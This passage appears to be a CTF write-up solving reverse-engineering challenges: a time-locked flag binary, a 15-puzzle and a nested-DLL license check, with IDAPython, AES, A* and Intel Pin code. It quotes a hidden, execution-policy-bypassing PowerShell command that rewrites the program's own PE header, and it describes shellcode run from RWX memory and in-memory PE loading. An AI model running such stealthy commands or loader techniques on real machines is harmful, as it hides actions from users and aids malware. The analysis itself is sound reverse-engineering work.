    sign_bit = 1 << (bits - 1)
    return value - (1 << bits) if value & sign_bit else value

def extract_data_from_insn(ea):
    """Decode the instruction at `ea` as a store into an rbp-relative slot.

    Two shapes are recognised:
      * movdqa [rbp+off], xmmN  -> (off, 16 zero bytes) as a placeholder
      * mov    [rbp+off], imm   -> (off, immediate as little-endian bytes,
                                    1/2/4/8 bytes according to operand size)

    Returns (offset, data) with a sign-extended offset, or (None, None)
    when the instruction cannot be decoded or matches neither shape.
    """
    insn = idaapi.insn_t()
    if not idaapi.decode_insn(insn, ea):
        return None, None

    dst, src = insn.ops[0], insn.ops[1]
    stores_to_rbp = dst.type == idaapi.o_displ and dst.reg == idaapi.str2reg("rbp")

    if insn.itype == idaapi.NN_movdqa and stores_to_rbp and src.type == idaapi.o_reg:
        return sign_extend(dst.addr), b'\x00' * 16

    if insn.itype == idaapi.NN_mov and stores_to_rbp and src.type == idaapi.o_imm:
        offset = sign_extend(dst.addr)
        # Operand size class -> number of immediate bytes stored.
        widths = {
            idaapi.dt_byte: 1,
            idaapi.dt_word: 2,
            idaapi.dt_dword: 4,
            idaapi.dt_qword: 8,
        }
        width = widths.get(src.dtype)
        if width is None:
            return None, None
        mask = (1 << (8 * width)) - 1
        return offset, (src.value & mask).to_bytes(width, 'little')

    return None, None

# Scan the '.ch' segment for runs of instructions that build a stack string
# (xmm loads from memory, xmm stores to [rbp+off], immediate stores to
# [rbp+off]), reassemble the bytes by offset and brute-force the one-byte
# rolling XOR key, printing every key whose output is fully printable.
def main():
seg_start = get_segment_by_name('.ch')
if seg_start is None:
print("[-] Segment '.ch' not found!")
return

seg = idaapi.getseg(seg_start)
seg_end = seg.end_ea
ea = seg_start

while ea < seg_end:
# Skip anything that is not code or cannot be decoded.
if not idaapi.is_code(idaapi.get_flags(ea)):
ea = idaapi.next_head(ea, seg_end)
continue
insn = idaapi.insn_t()
if not idaapi.decode_insn(insn, ea):
ea = idaapi.next_head(ea, seg_end)
continue

# A block can only start at "movdqa xmmN, <memory>".
if not (insn.itype == idaapi.NN_movdqa and
insn.ops[0].type == idaapi.o_reg and
insn.ops[1].type == idaapi.o_mem):
ea = idaapi.next_head(ea, seg_end)
continue
# block_data: rbp offset -> bytes stored there
# last_xmm_data: xmm register -> 16 bytes most recently loaded into it
block_data = {}
current_ea = ea
last_xmm_data = {}

# Consume consecutive instructions until one matches none of the shapes.
while current_ea < seg_end:
insn = idaapi.insn_t()
if not idaapi.decode_insn(insn, current_ea):
break
# Shape 1: movdqa xmmN, <memory> - remember the constant.
if (insn.itype == idaapi.NN_movdqa and
insn.ops[0].type == idaapi.o_reg and
insn.ops[1].type == idaapi.o_mem):
reg_idx = insn.ops[0].reg
mem_addr = insn.ops[1].addr
data = idaapi.get_bytes(mem_addr, 16)
if data and len(data) == 16:
last_xmm_data[reg_idx] = data
current_ea = idaapi.next_head(current_ea, seg_end)
continue
# Shape 2: movdqa [rbp+off], xmmN - place the remembered constant.
if (insn.itype == idaapi.NN_movdqa and
insn.ops[0].type == idaapi.o_displ and
insn.ops[0].reg == idaapi.str2reg("rbp") and
insn.ops[1].type == idaapi.o_reg):
offset = sign_extend(insn.ops[0].addr)
reg_idx = insn.ops[1].reg
if reg_idx in last_xmm_data:
block_data[offset] = last_xmm_data[reg_idx]
current_ea = idaapi.next_head(current_ea, seg_end)
continue
# Shape 3: mov [rbp+off], imm - handled by extract_data_from_insn.
offset, data = extract_data_from_insn(current_ea)
if offset is not None and data is not None:
block_data[offset] = data
current_ea = idaapi.next_head(current_ea, seg_end)
continue
break
if block_data:
# Lay the pieces out by ascending offset, zero-filling any gaps.
offsets = sorted(block_data.keys())
min_off = offsets[0]
full_data = bytearray()
expected_off = min_off
for off in offsets:
gap = off - expected_off
if gap > 0:
full_data.extend(b'\x00' * gap)
full_data.extend(block_data[off])
expected_off = off + len(block_data[off])
print(f"\n[?] Block at {ea:#x}, offsets: {offsets[:5]}{'...' if len(offsets)>5 else ''}")
# Try all 256 keys and keep those producing only printable bytes.
solutions = []
for key in range(256):
plain = decrypt_with_key(full_data, key)
if is_printable(plain):
solutions.append((key, plain))
if solutions:
print(f"[+] Found {len(solutions)} solution(s):")
newline = '\n'
for key, plain in solutions:
decoded = plain.decode('ascii', errors='replace')
output = repr(decoded) if len(decoded) > 60 or newline in decoded else decoded
print(f" Key=0x{key:02X}: {output}")
else:
print("[-] No printable decryption.")
# Resume after the consumed block, or at the next instruction if nothing was collected.
ea = current_ea if block_data else idaapi.next_head(ea, seg_end)

print("\n[+] Done.")

if __name__ == '__main__':
main()

The strings are:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
0x14001B3A7: 
powershell -executionpolicy bypass -noninteractive -nologo -NoProfile -WindowStyle Hidden -Command "Start-Sleep 1; $p='

0x14001B507:
'; $b=[IO.File]::ReadAllBytes($p);$e=[BitConverter]::ToInt32($b,0x3C);$z=[BitConverter]::GetBytes(0);$z.CopyTo($

0x14001B610:
b,$e+8);[IO.File]::WriteAllBytes($p,$b)"

0x14001CF2D:
===============================================================
> Welcome to Flar-... whoops I meant Crackmes.one Reverse Engineering CTF 2026!
> You must only attempt this challenge while the CTF is running.
> Therefore you need to be quick, 'Tempus Fugit' in the blink of an eye.
> Now listen carefully...
> The wandering time shall not bend,
> Seize it once, or it's gone to the end.
> Good luck, fellow traveller. Please save us. ~>-->-->~


*Journal entry from January 19, 2038 by [@heapsoverflow]
===============================================================

Press ENTER if you read...

0x14001D441:
Time's up. Every old system switched to 64-bit but at what cost... You can still try though.

0x14001D554:
This is the last day, my friend. Please hurry...

0x14001D629:
Still struggling, soldier? You've got plenty of time.

0x14001D6DA:
Ah yes, you either snuck in to review things before the CTF, or you're just playing games with the dates. Very recreational.

0x14001DB61:
Wrong timing.

0x14001DBFD:
Wow... Thank you for the effort! *Can you also stop Sam Altman?* Here's the flag:

0x14001F415:
4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7

From these strings we can see the right case is at 0x14001DBFD:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
.ch:00007FF60465DB31 loc_7FF60465DB31:                       ; CODE XREF: .text:00007FF604644885↑j
.ch:00007FF60465DB31 lea r8, [rbp+420h]
.ch:00007FF60465DB38 lea rdx, [rbp+438h]
.ch:00007FF60465DB3F lea rcx, [rbp+408h]
.ch:00007FF60465DB46 call loc_7FF60464326C
.ch:00007FF60465DB4B mov rax, [rbp+408h]
.ch:00007FF60465DB52 cmp byte ptr [rax], 43h ; 'C'
.ch:00007FF60465DB55 js loc_7FF6046448A3
.ch:00007FF60465DB5B jns loc_7FF6046448A3

.text:00007FF6046448A3 loc_7FF6046448A3: ; CODE XREF: .ch:00007FF60465DB27↓j
.text:00007FF6046448A3 ; .ch:00007FF60465DB55↓j ...
.text:00007FF6046448A3 jz short case_flag
.text:00007FF6046448A5 cmp byte ptr [rax+1], 4Dh ; 'M'
.text:00007FF6046448A9 jz short case_flag
.text:00007FF6046448AB nop
.text:00007FF6046448AC nop
.text:00007FF6046448AD nop
.text:00007FF6046448AE nop
.text:00007FF6046448AF jz Wrong_timing_1
.text:00007FF6046448B5 jnz Wrong_timing_2

Note that at this address the program compares [rax] with “CM” (the flag header), so by this point the flag has already been decrypted. Since [rax] is a 48-byte array and the suspicious hex string is 96 characters long, 4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7 is without doubt the ciphertext. Set a hardware breakpoint on this ciphertext, and:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
.ch:00007FF60466572A ; __int64 __fastcall __far loc_7FF60466572A(void *)
.ch:00007FF60466572A loc_7FF60466572A: ; CODE XREF: .text:00007FF604647BCA↑j
.ch:00007FF60466572A mov [rsp+20h], rbx
.ch:00007FF60466572F push rbp
.ch:00007FF604665730 push rsi
.ch:00007FF604665731 push rdi
.ch:00007FF604665732 sub rsp, 30h
.ch:00007FF604665736 mov rsi, rcx
.ch:00007FF604665739 mov rdi, r8
.ch:00007FF60466573C mov rcx, 7FFFFFFFFFFFFFFFh
.ch:00007FF604665746 mov rbp, rdx
.ch:00007FF604665749 cmp r8, rcx
.ch:00007FF60466574C jle loc_7FF604647BE6
.ch:00007FF604665752 jg loc_7FF604647BE6
.ch:00007FF604665758 sub eax, 0FE46AEA0h
.ch:00007FF60466575D
.ch:00007FF60466575D loc_7FF60466575D: ; CODE XREF: .text:00007FF604647BF2↑j
.ch:00007FF60466575D mov rcx, rsi ; void *
.ch:00007FF604665760 mov [rsi+10h], r8
.ch:00007FF604665764 mov qword ptr [rsi+18h], 0Fh
.ch:00007FF60466576C call memcpy
.ch:00007FF604665771 mov byte ptr [rdi+rsi], 0
.ch:00007FF604665775 jl loc_7FF604647C06
.ch:00007FF60466577B jge loc_7FF604647C06
.ch:00007FF604665781
.ch:00007FF604665781 loc_7FF604665781: ; CODE XREF: .text:loc_7FF604647C0B↑j
.ch:00007FF604665781 mov rax, rdi
.ch:00007FF604665784 or rax, 0Fh
.ch:00007FF604665788 cmp rax, rcx
.ch:00007FF60466578B js loc_7FF604647C12
.ch:00007FF604665791 jns loc_7FF604647C12
.ch:00007FF604665797
.ch:00007FF604665797 loc_7FF604665797: ; CODE XREF: .text:00007FF604647C14↑j
.ch:00007FF604665797 mov edx, 16h
.ch:00007FF60466579C mov rcx, rax
.ch:00007FF60466579F cmp rax, rdx
.ch:00007FF6046657A2 cmovb rcx, rdx
.ch:00007FF6046657A6 jmp loc_7FF604647C23

This is where the 96-character hex string is converted to 48 bytes. Set a breakpoint again, this time on the 48 bytes:

1
2
3
4
5
6
7
.ch:00007FF60466347E loc_7FF60466347E:                       ; CODE XREF: .text:00007FF604643320↑j
.ch:00007FF60466347E movups xmm0, xmmword ptr [rbx]
.ch:00007FF604663481 lea rdx, [rsp+40h]
.ch:00007FF604663486 mov rcx, rbx
.ch:00007FF604663489 call loc_7FF604641498
.ch:00007FF60466348E mov ecx, 10h
.ch:00007FF604663493 jmp loc_7FF60464332F

This is where the 48 bytes are read. Moreover, [rsp+40h] holds a string of the form 000...<Username> (the username comes from the call to 0x1400033B4 at 0x14001D850, and the padding is added by the call to 0x140003D98 at 0x14001D8A4). It is exactly 16 bytes long. Debugging shows that the array used for the comparison after decryption is the result of an AES-128-CBC decryption that uses this string as the key and iv = 000...<a value related to the timestamp>. The iv is generated at:

1
2
3
4
5
6
7
.ch:00007FF60465D9AB loc_7FF60465D9AB:                       ; CODE XREF: .text:00007FF6046447D4↑j
.ch:00007FF60465D9AB call loc_7FF604643734
.ch:00007FF60465D9B0 xor eax, edi
.ch:00007FF60465D9B2 mov edx, eax
.ch:00007FF60465D9B4 lea rcx, [rbp+150h]
.ch:00007FF60465D9BB call loc_7FF604647034
.ch:00007FF60465D9C0 jmp loc_7FF6046447E3

loc_7FF604643734 returns an int, and this int XOR the timestamp is the iv’s value. What it returns is the TimeDateStamp from the PE header of the program itself. Recall the PowerShell script among the strings above: powershell -executionpolicy bypass -noninteractive -nologo -NoProfile -WindowStyle Hidden -Command "Start-Sleep 1; $p=''; $b=[IO.File]::ReadAllBytes($p);$e=[BitConverter]::ToInt32($b,0x3C);$z=[BitConverter]::GetBytes(0);$z.CopyTo($b,$e+8);[IO.File]::WriteAllBytes($p,$b)". It overwrites the TimeDateStamp with 0, which probably means the program only gets one chance to run with the correct value. Anyway, the username can be found in the build (PDB path) information of the program:

1
2
3
4
5
6
7
.rdata:00007FF60464D590 asc_7FF60464D590 db 'RSDS'              ; DATA XREF: .rdata:00007FF60464C5F4↑o
.rdata:00007FF60464D590 ; CV signature
.rdata:00007FF60464D594 GUID <0> ; GUID
.rdata:00007FF60464D5A4 dd 0 ; Age
.rdata:00007FF60464D5A8 text "UTF-8", 'C:\Users\nicetryboogeyman\cmo\x64\Release\cmo.pdb',0,0 ; PdbFileName
.rdata:00007FF60464D5DB text "UTF-8", 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.rdata:00007FF60464D5F7 text "UTF-8", 0,0,0

And try a value near 0x20000000 (this is the result range obtained by XORing the original TimeDateStamp of the program around February 17~18th) as iv to decrypt:

1
2
3
4
5
6
7
8
9
10
from Crypto.Cipher import AES

ct = bytes.fromhex("4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7")

key = b"nicetryboogeyman"
iv = b"0000000536870912"

pt = AES.new(key, AES.MODE_CBC, iv).decrypt(ct)
print(pt)
print(pt[:-3].decode("ascii")) # CMO{5h3_p5[uW8w^t0_l34rn_fr0M_n0T_t0_l1V3_1n}

This is very close to the flag. After fine-tuning, the correct IV can be obtained as 0000000537068053.

CMO{5h3_p4St_1s_t0_l34rn_fr0M_n0T_t0_l1V3_1n}

Hard

wallpaper

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from heapq import heappush, heappop

# Initial board packed into 64 bits: nibble i (lowest first) is the value in cell i.
START_STATE = 0xB6FD071E9C8A3425
# Target board: cell i holds value i.
GOAL_STATE = 0xFEDCBA9876543210
# Move digit -> index delta for the blank (value 0) on the 4x4 grid:
# 0 = one row up, 1 = one column left, 2 = one row down, 3 = one column right.
MOVE_OFF = {0: -4, 1: -1, 2: +4, 3: +1}

def nibbles_u64(x: int):
    """Split `x` into its 16 lowest nibbles, least-significant nibble first."""
    cells = []
    for shift in range(0, 64, 4):
        cells.append((x >> shift) & 0xF)
    return tuple(cells)

def u64_from_nibbles(nibs):
    """Pack a sequence of nibbles into an integer, first element in the lowest 4 bits.

    Each element is masked to 4 bits before being placed.
    """
    packed = 0
    shift = 0
    for nib in nibs:
        packed |= (nib & 0xF) << shift
        shift += 4
    return packed

def manhattan(state, goal_pos):
    """Sum of Manhattan distances of all non-blank tiles to their goal cells.

    `state` is a sequence of 16 cell values on a 4x4 grid; `goal_pos` maps
    a tile value to its goal index. The blank (value 0) is not counted.
    """
    total = 0
    for here, tile in enumerate(state):
        if tile == 0:
            continue
        there = goal_pos[tile]
        row_gap = abs(here // 4 - there // 4)
        col_gap = abs(here % 4 - there % 4)
        total += row_gap + col_gap
    return total

def legal_moves(blank_idx: int):
    """List the move digits available when the blank sits at `blank_idx`.

    Digits are returned in ascending order: 0 (needs a row above),
    1 (needs a column to the left), 2 (needs a row below),
    3 (needs a column to the right).
    """
    row, col = divmod(blank_idx, 4)
    checks = ((0, row > 0), (1, col > 0), (2, row < 3), (3, col < 3))
    return [digit for digit, allowed in checks if allowed]

def neighbors(state):
    """Yield (next_state, move_digit) for every legal move of the blank in `state`."""
    blank = state.index(0)
    for digit in legal_moves(blank):
        target = blank + MOVE_OFF[digit]
        board = list(state)
        board[blank], board[target] = board[target], board[blank]
        yield tuple(board), digit

# A* search from `start` to `goal` (both 16-tuples of cell values) using the
# Manhattan-distance heuristic. Returns the list of move digits leading from
# start to goal, or None when the queue empties without reaching the goal.
def astar(start, goal):
goal_pos = {v: i for i, v in enumerate(goal)}
h0 = manhattan(start, goal_pos)
# Priority queue entries are (f = g + h, g, state).
pq = []
heappush(pq, (h0, 0, start))
# came: state -> (previous state, move that produced it); gscore: best known cost.
came = {start: (None, None)}
gscore = {start: 0}
while pq:
f, g, s = heappop(pq)
if s == goal:
# Walk the predecessor links back to the start, then reverse.
path = []
cur = s
while came[cur][0] is not None:
prev, d = came[cur]
path.append(d)
cur = prev
path.reverse()
return path
# Skip stale queue entries that were superseded by a cheaper path.
if g != gscore[s]: continue
for ns, d in neighbors(s):
ng = g + 1
if ns not in gscore or ng < gscore[ns]:
gscore[ns] = ng
came[ns] = (s, d)
heappush(pq, (ng + manhattan(ns, goal_pos), ng, ns))
return None

def apply_moves(state, digits):
    """Replay a string of move digits on `state`.

    Returns the resulting board as a tuple, or None as soon as a digit is
    not a legal move for the current blank position.
    """
    board = list(state)
    for symbol in digits:
        move = int(symbol)
        blank = board.index(0)
        if move not in legal_moves(blank):
            return None
        target = blank + MOVE_OFF[move]
        board[blank], board[target] = board[target], board[blank]
    return tuple(board)

def main():
    """Solve the puzzle from START_STATE to GOAL_STATE and print the move digits.

    The solution is replayed as a sanity check before it is printed.
    """
    start = nibbles_u64(START_STATE)
    goal = nibbles_u64(GOAL_STATE)

    path = astar(start, goal)
    if path is None:
        raise SystemExit("No solution found")

    moves = "".join(map(str, path))
    if apply_moves(start, moves) != goal:
        raise SystemExit("Internal check failed")
    print(moves)


if __name__ == "__main__":
    main()

CMO{1012321103210033011233322110103321001}

Matryoshka v2

The program’s logic is very simple:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
// Entry point (decompiler output). Reads license.bin into a NUL-terminated
// buffer, loads Doll.dll and passes the buffer to its CheckPassword export.
// Returns 0 on a correct license, 1 if the file cannot be read, 2 if
// CheckPassword cannot be resolved, 3 on a wrong license.
int __fastcall main(int argc, const char **argv, const char **envp)
{
Stream = fopen("license.bin", "rb");
Stream_1 = Stream;
if ( !Stream )
goto LABEL_12;
// Determine the file size (seek to end, tell, rewind).
fseek(Stream, 0, 2);
ElementCount = ftell(Stream_1);
rewind(Stream_1);
if ( (int)ElementCount <= 0 )
goto LABEL_11;
// One extra byte for the terminator; on overflow the size becomes -1.
Size = (int)ElementCount + 1;
if ( __OFADD__(1, (_DWORD)ElementCount) )
Size = -1;
Buffer = malloc(Size);
Buffer_1 = Buffer;
if ( !Buffer )
{
LABEL_11:
fclose(Stream_1);
LABEL_12:
printf("Failed to read license.bin\n");
return 1;
}
// NUL-terminate right after the bytes actually read.
Buffer[fread(Buffer, 1u, ElementCount, Stream_1)] = 0;
fclose(Stream_1);
hModule = LoadLibraryA("Doll.dll");
CheckPassword = GetProcAddress(hModule, "CheckPassword");
if ( CheckPassword )
{
if ( ((unsigned int (__fastcall *)(_BYTE *))CheckPassword)(Buffer_1) == 1 )
{
printf("Correct license\n");
return 0;
}
else
{
printf("Wrong license\n");
return 3;
}
}
else
{
printf("Could not load Doll.dll\n");
return 2;
}
}

The dll has two resources: a 1 MB shellcode and an encrypted PE file of over 60 MB. The shellcode is a single block of heavily obfuscated code. The dll:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
// Exported check (decompiler output). Runs the "CHECK" resource as code on the
// first 32 bytes of the input; on success, passes the "MATRYOSHKA" resource
// through SystemFunction033 with those 32 bytes as the key, loads the result
// as a PE and forwards the input, advanced by 32 bytes, to its check routine.
__int64 __fastcall CheckPassword(_OWORD *a1)
{
Src_1[0] = 0;
Src[0] = 0;
Size = 0;
// High dword of Size receives the MATRYOSHKA size, low dword the CHECK size.
Res = LoadRes((__int64)a1, Src_1, (DWORD *)&Size + 1, (const WCHAR *)L"MATRYOSHKA");
v4 = LoadRes(v3, Src, (DWORD *)&Size, (const WCHAR *)L"CHECK");
// Inline strlen(a1).
v5 = -1;
do
++v5;
while ( *((_BYTE *)a1 + v5) );
// Empty remaining input with both LoadRes calls returning non-zero: report success.
if ( !v5 && Res && v4 )
return 1;
Size_1 = (unsigned int)Size;
// Read/write/execute allocation that will hold the CHECK shellcode.
lpAddress = (__int64 (__fastcall *)(_OWORD *))VirtualAlloc(0, (unsigned int)(Size + 1), 0x3000u, 0x40u);
lpAddress_1 = lpAddress;
if ( !lpAddress )
{
p_Could_not_load_next_doll = L"VirtualAlloc failed for CHECK";
LABEL_9:
MessageBoxW(0, p_Could_not_load_next_doll, L"Error", 0x10u);
return 0;
}
memcpy(lpAddress, Src[0], Size_1);
// Copy the first 32 input bytes to a local buffer and run the shellcode on it.
v11 = *a1;
v12 = a1[1];
v24 = 0;
v23[0] = v11;
v23[1] = v12;
v13 = lpAddress_1(v23);
VirtualFree(lpAddress_1, 0, 0x8000u);
if ( !v13 )
return 0;
Size_2 = HIDWORD(Size);
lpAddress_2 = malloc(HIDWORD(Size));
memcpy(lpAddress_2, Src_1[0], (unsigned int)Size_2);
hModule = GetModuleHandleA("advapi32");
if ( !hModule )
hModule = LoadLibraryA("advapi32");
ProcAddress = GetProcAddress(hModule, "SystemFunction033");
if ( ProcAddress )
{
// Src_1 becomes the key descriptor {length 32, a1};
// Src becomes the data descriptor {length Size_2, lpAddress_2}.
Src_1[1] = a1;
LODWORD(Src_1[0]) = 32;
Src[1] = lpAddress_2;
LODWORD(Src[0]) = Size_2;
((void (__fastcall *)(void **, void **))ProcAddress)(Src, Src_1);
}
PE = (__int64 *)LoadPE((int *)lpAddress_2, Size_2);
free(lpAddress_2);
if ( !PE )
{
p_Could_not_load_next_doll = L"Could not load next doll";
goto LABEL_9;
}
v19 = (__int64 (__fastcall *)(_OWORD *))FindNextCheck(PE);
if ( !v19 )
return 0;
// a1 is an _OWORD pointer, so a1 + 2 skips the 32 bytes just consumed.
return v19(a1 + 2);
}

So every Doll.dll uses its shellcode to check 32 bytes of the input, and then uses those same 32 bytes as the key to decrypt the next dll.

1
2
3
4
5
movsx   eax, byte ptr [rax] ; * 32 (strlen?)
mov rcx, [rcx+rax] ; → 8 byte * 4
; in a qword check:
mov rax, <qword>
mov rax, <qword>

Because the number of instructions is too large to analyze by hand, use a Pin trace tool to record the changes of rax and rcx inside the shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
#include "pin.H"
#include <string>
#include <algorithm>
#include <cstdio>
#include <cctype>

// Command-line knobs: "-o" selects the log file and "-call_rva" gives the RVA
// of the shellcode call site inside Doll.dll.
KNOB<std::string> KnobOut(KNOB_MODE_WRITEONCE, "pintool", "o", "E:/CTF/temp/log.txt", "output log path");
KNOB<UINT64> KnobCallRva(KNOB_MODE_WRITEONCE, "pintool", "call_rva", "0x120B", "RVA of 'call rsi' in Doll.dll (default 0x120B)");

// Absolute address of the call site; stays 0 until ImageLoad sees doll.dll.
static ADDRINT g_callsite = 0;
// Guards every write to g_fp.
static PIN_LOCK g_lock;
// Log stream, opened in main() and closed in Fini().
static FILE* g_fp = nullptr;

// Per-thread tracing state kept in the Pin TLS slot g_tls.
struct TData {
    // Set by EnterShellcode, cleared by ExitShellcode.
    bool in_sc = false;
    // Half-open address range [sc_lo, sc_hi) that ShouldLog accepts.
    ADDRINT sc_lo = 0;
    ADDRINT sc_hi = 0;
    // Return value and size argument recorded around VirtualAlloc.
    ADDRINT last_va_base = 0;
    ADDRINT last_va_size = 0;
    // Most recently logged register values; start at the all-ones sentinel.
    ADDRINT last_rax = ~ADDRINT(0);
    ADDRINT last_rcx = ~ADDRINT(0);
    // Text buffer written out by FlushBuf.
    std::string buf;
};

static TLS_KEY g_tls;

// Returns a copy of `s` in which every character has been passed through
// std::tolower (via unsigned char, so negative char values are safe).
static inline std::string ToLower(std::string s) {
    for (char& ch : s) {
        ch = (char)std::tolower((unsigned char)ch);
    }
    return s;
}

// Fetches the TData pointer stored in this thread's g_tls slot (may be null).
static TData* GetTD(THREADID tid) {
    void* slot = PIN_GetThreadData(g_tls, tid);
    return static_cast<TData*>(slot);
}

// Thread-start callback: allocates the per-thread state, pre-reserves 1 MiB
// for its text buffer and publishes it in the g_tls slot.
static VOID ThreadStart(THREADID tid, CONTEXT*, INT32, VOID*) {
    TData* state = new TData();
    state->buf.reserve(1 << 20);
    PIN_SetThreadData(g_tls, state, tid);
}

// Thread-exit callback: releases the state allocated in ThreadStart.
static VOID ThreadFini(THREADID tid, const CONTEXT*, INT32, VOID*) {
    // Deleting a null pointer is a no-op, so no explicit check is needed.
    delete GetTD(tid);
}

// Writes the thread's buffered text to the log under g_lock, then empties
// the buffer. Does nothing when the log is closed or the buffer is empty.
static VOID FlushBuf(TData* td) {
    const bool nothing_to_do = (g_fp == nullptr) || td->buf.empty();
    if (nothing_to_do) {
        return;
    }

    PIN_GetLock(&g_lock, 0);
    fwrite(td->buf.data(), 1, td->buf.size(), g_fp);
    fflush(g_fp);
    PIN_ReleaseLock(&g_lock);

    td->buf.clear();
}

// Runs before VirtualAlloc: remembers the requested size (second argument)
// for the calling thread.
static VOID VA_Before(THREADID tid, ADDRINT, ADDRINT dwSize, ADDRINT, ADDRINT) {
    if (TData* state = GetTD(tid)) {
        state->last_va_size = dwSize;
    }
}

// Runs after VirtualAlloc: remembers the returned base address for the
// calling thread.
static VOID VA_After(THREADID tid, ADDRINT ret) {
    if (TData* state = GetTD(tid)) {
        state->last_va_base = ret;
    }
}

// Called right before the instrumented call site executes. Marks the thread
// as "inside shellcode", resets the last-logged registers and picks the
// address range to trace: the last VirtualAlloc region when its base equals
// the call target, otherwise a 0x200000-byte window starting at the target.
static VOID EnterShellcode(THREADID tid, ADDRINT shell_entry, ADDRINT /*ip*/) {
    TData* state = GetTD(tid);
    if (state == nullptr || g_fp == nullptr) {
        return;
    }

    state->in_sc = true;
    state->last_rax = (ADDRINT)-1;
    state->last_rcx = (ADDRINT)-1;

    const bool matches_alloc =
        state->last_va_size > 0 && state->last_va_base == shell_entry;
    const ADDRINT span = matches_alloc ? state->last_va_size : (ADDRINT)0x200000;
    state->sc_lo = shell_entry;
    state->sc_hi = shell_entry + span;

    PIN_GetLock(&g_lock, 0);
    fprintf(g_fp, "===== enter shellcode entry=0x%llX range=[0x%llX,0x%llX) =====\n",
            (unsigned long long)shell_entry,
            (unsigned long long)state->sc_lo,
            (unsigned long long)state->sc_hi);
    fflush(g_fp);
    PIN_ReleaseLock(&g_lock);
}

// Called on the fall-through path of the call site: stops tracing for this
// thread and writes the closing banner to the log.
static VOID ExitShellcode(THREADID tid) {
    TData* state = GetTD(tid);
    if (state == nullptr || g_fp == nullptr) {
        return;
    }

    state->in_sc = false;

    PIN_GetLock(&g_lock, 0);
    fprintf(g_fp, "===== exit shellcode =====\n");
    fflush(g_fp);
    PIN_ReleaseLock(&g_lock);
}

// If-predicate for the per-instruction analysis call: returns 1 only when
// this thread is inside the shellcode and `ip` lies in [sc_lo, sc_hi).
static ADDRINT ShouldLog(THREADID tid, ADDRINT ip) {
    const TData* state = GetTD(tid);
    const bool inside = state != nullptr
                     && state->in_sc
                     && state->sc_lo <= ip
                     && ip < state->sc_hi;
    return inside ? 1 : 0;
}

// Logs rax and/or rcx whenever the value differs from the one last logged on
// this thread, so the log only contains register changes.
static VOID LogRegs(THREADID tid, ADDRINT rax, ADDRINT rcx) {
    TData* state = GetTD(tid);
    if (state == nullptr || g_fp == nullptr) {
        return;
    }

    if (state->last_rax != rax) {
        PIN_GetLock(&g_lock, 0);
        fprintf(g_fp, "rax = 0x%llX\n", (unsigned long long)rax);
        PIN_ReleaseLock(&g_lock);
        state->last_rax = rax;
    }

    if (state->last_rcx != rcx) {
        PIN_GetLock(&g_lock, 0);
        fprintf(g_fp, "rcx = 0x%llX\n", (unsigned long long)rcx);
        PIN_ReleaseLock(&g_lock);
        state->last_rcx = rcx;
    }
}


// Image-load callback. Hooks VirtualAlloc in any image that exports it, and
// when an image whose lower-cased name contains "doll.dll" is loaded,
// resolves the call-site address from its base plus the configured RVA.
static VOID ImageLoad(IMG img, VOID* /*v*/) {
    const std::string image_name = ToLower(IMG_Name(img));

    RTN alloc_rtn = RTN_FindByName(img, "VirtualAlloc");
    if (RTN_Valid(alloc_rtn)) {
        RTN_Open(alloc_rtn);
        RTN_InsertCall(alloc_rtn, IPOINT_BEFORE, (AFUNPTR)VA_Before,
                       IARG_THREAD_ID,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 0,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 1,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 2,
                       IARG_FUNCARG_ENTRYPOINT_VALUE, 3,
                       IARG_END);
        RTN_InsertCall(alloc_rtn, IPOINT_AFTER, (AFUNPTR)VA_After,
                       IARG_THREAD_ID,
                       IARG_FUNCRET_EXITPOINT_VALUE,
                       IARG_END);
        RTN_Close(alloc_rtn);
    }

    if (image_name.find("doll.dll") == std::string::npos) {
        return;
    }

    const ADDRINT base = IMG_LowAddress(img);
    const UINT64 rva = KnobCallRva.Value();
    g_callsite = base + (ADDRINT)rva;

    PIN_GetLock(&g_lock, 0);
    if (g_fp) {
        std::fprintf(g_fp, "[+] Doll.dll loaded: base=0x%llX, callsite=0x%llX (rva=0x%llX)\n", (unsigned long long)base, (unsigned long long)g_callsite, (unsigned long long)rva);
        std::fflush(g_fp);
    }
